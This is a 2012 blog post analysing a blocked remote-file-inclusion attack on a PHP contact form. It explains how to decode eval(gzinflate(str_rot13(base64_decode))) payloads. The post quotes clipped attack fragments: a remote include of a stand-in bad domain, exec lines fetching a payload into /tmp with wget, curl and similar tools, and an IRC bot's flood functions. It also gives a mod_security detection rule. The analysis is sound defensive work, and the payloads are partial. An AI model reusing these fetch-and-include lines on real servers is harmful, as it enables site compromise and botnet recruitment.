Recent Posts


« | Main | »

PHP – decoding ‘gzinflate(str_rot13(base64_decode’ hack attempts

By Dale Reagan | April 9, 2012

A recent ‘alarm’ about RFI (remote file inclusion)  ‘attacks’ against PHP coded web sites (i.e. any WordPress site) got me curious about some of my log messages.  In this case the web server/PHP application were not compromised due to a somewhat guarded server configuration.  The configuration also ‘captured’ the triple-encoded attack code (some excerpts below.)

When you first look at this it’s simply ‘a mess’ due to the triple encoding:

When you review these types of POST attempts you will see ‘eval’ calls in front of them – if the code were executed then the ‘eval’ would ‘run the code‘…  From a recent (single attempt – note that lines have been randomly clipped and spaces have been introduced.)

eval (base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0K
eval (base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lz
eval (in cl ude('http://www.SOME_BAD_DOMAIN. com%2Fmods%2F%2Fbt.php;))
eval (gzinflate(str_rot13(base64_decode('7Rz9SuM28ufsXyHcvL6kG

So how do you decode this stuff? (‘gzinflate(str_rot13(base64_decode’)

Decode-Via-Echo: Simplest method is to replace the ‘eval’ calls with ‘echo’ to ‘print’ the decoded data. Note that the examples above are ‘snippets’ and that you must use a CLI version of PHP for the simple decode examples to work… The first two lines show PHP code and HTML code. The third line was not encoded and is an attempt to include PHP code from a ‘bad’ web server. The fourth line can only be decoded if you include the entire base64_encoded string.

php -r 'echo (base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0K'));'
OUTPUT:  if(function_exists('exec')){
php -r 'echo (base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lz'));'
OUTPUT: echo "Some_Hackers_Sig_Code<br>";
php -r '(gzinflate(str_rot13(base64_decode('7Rz9SuM28ufsXyHcvL6kG'))%3B
THE ABove line will 'fail' since the entire 'gzipped' string is required - so 
make sure to include the entire encoded string if you try the 'decode via echo' approach...

Once you confirm that above decoding approach works you can:

A ‘scripted’ version/example follows – save as a file (i.e. /tmp/test-bad.php) and the run with ‘php /tmp/test-bad.php’:

<? php
echo (base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0K'));
echo (base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lz'));

In this case the de-coded attack code includes a number of functions (as well as whatever code was in the remotely included file ( i.e. line 3 above…)  The beginning of the code attempts to setup a ‘botshell’ environment and includes logic to try multiple methods to create and fetch files (guessing a bit.):

### Start ### - lines have been 'cut/shortened'
@exec("cd /tmp && wget ".$injector." -O
@exec("cd /tmp && fetch -O pb.php ".$injector
@exec("cd /tmp && cUrl -O pb.php ".$injector.
@exec("cd /tmp && lynx -dump ".$injector." pb
@exec("cd /tmp && GET ".$injector.">pb.php &&
@exec("cd /tmp && lwp-download ".$injector."
## snippets below - trying different methods to 'setup' ##
function ex($cfe){

This is followed by a set of self-describing functions:

function start()
function main()
function send($msg)
function join($chan,$key=NULL)
function privmsg($to,$msg)
function notice($to,$msg)
function is_logged_in($host)
function log_in($host)
function log_out($host)
function set_nick() {
function set_ident() {
function udpflood($host,$packetsize,$time) {
function tcpflood($host,$packets,$packetsize,$port,$delay)
function hostinfo() {

Note the presence of ‘flood’ functions – so in this case the code is attempting to turn the server into a ‘bot node’ (most likely.)

The config portion of the code includes a domain name (possibly another compromised system) along with a network port and other information:

var $config = array("server"=>"SomeBadDomain . nl",
var $users = array();


How to block/defend against these types of attacks? (RFI)

In this case the attack originated from an IP in Tampa, FL (USA.) I will guess that the PC/server at that location is part of the bot-net.  Based on the code it appears that the control server is in Europe.  Given the history of such bot-nets chances are that command & control is distributed so tracking things down would probably require multi-national resources.  Ok, sounds like most folks are going to be limited to ‘front-line’ defenses like:

The web server log for this attack was a single line:

  IP_OF_ATTA_CKER – – [08/Apr/2012:15:55:42 -0400] “POST /contact.php HTTP/1.1″ 412 2004 “-” “Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)” [55586/11977/2275] [ US/United States/FL/Tampa/813 ]

The ‘412’ response code was due to a WAF rule (mod_security.)  In this case, the mod_security log entry for this attack was something like:

Message: Access denied with code 5XX (phase 2). Pattern match “(?:\binclude\s*\([^)]*(ht|f)tps?:\/\/)” at ARGS:author_name. [file “rules.conf”] [line “2045”] [id “950118”] [rev “2.2.2”] [msg “Remote File Inclusion Attack“] [severity “CRITICAL”]

The attack used a ‘contact’ form as it’s path – this suggests taking extra time to review all pages/forms on your site(s) that allow POST actions.

Simple PHP rot_13, base64_encode, gzinflate examples

$my_string="Compress me - $my_date";
"   My String: '$my_string'\n";
$compressed   gzdeflate($my_string);
"  Compressed: '$compressed'\n";
$uncompressed gzinflate($compressed);
"Uncompressed: '$uncompressed'\n";
$rot_string str_rot13($my_string);
"       Rot13: '$rot_string'\n";
$un_rot_string str_rot13($rot_string);
"    Un-Rot13: '$un_rot_string'\n";
$b64_string base64_encode($my_string);
"  B64 string: '$b64_string'\n";
$decoded_64_string base64_decode($b64_string);
"  B64 decode: '$decoded_64_string'\n";

The output from the above will vary based on the ‘date’ but it should be similar to:

    My String: 'Compress me - Mon, 09 Apr 12 11:13:24 -0400'
   Compressed: 's��-(J-.V�MU�U����Q0�Tp,(R04R04�24�22Q�5010'
 Uncompressed: 'Compress me - Mon, 09 Apr 12 11:13:24 -0400'
        Rot13: 'Pbzcerff zr - Zba, 09 Nce 12 11:13:24 -0400'
     Un-Rot13: 'Compress me - Mon, 09 Apr 12 11:13:24 -0400'
   B64 string: 'Q29tcHJlc3MgbWUgLSBNb24sIDA5IEFwciAxMiAxMToxMzoyNCAtMDQwMA=='
   B64 decode: 'Compress me - Mon, 09 Apr 12 11:13:24 -0400'


Topics: Computer Technology, System and Network Security, Web Problem Solving, Web Technologies, Wordpress Software | Comments Off on PHP – decoding ‘gzinflate(str_rot13(base64_decode’ hack attempts

Comments are closed.

YOUR GeoIP Data | Ip:
Continent: NA | Country Code: US | Country Name: United States
Region: | State/Region Name: | City:
(US only) Area Code: 0 | Postal code/Zip:
Latitude: 38.000000 | Longitude: -97.000000
Note - if using a mobile device your physical location may NOT be accurate...

Georgia-USA.Com - Web Hosting for Business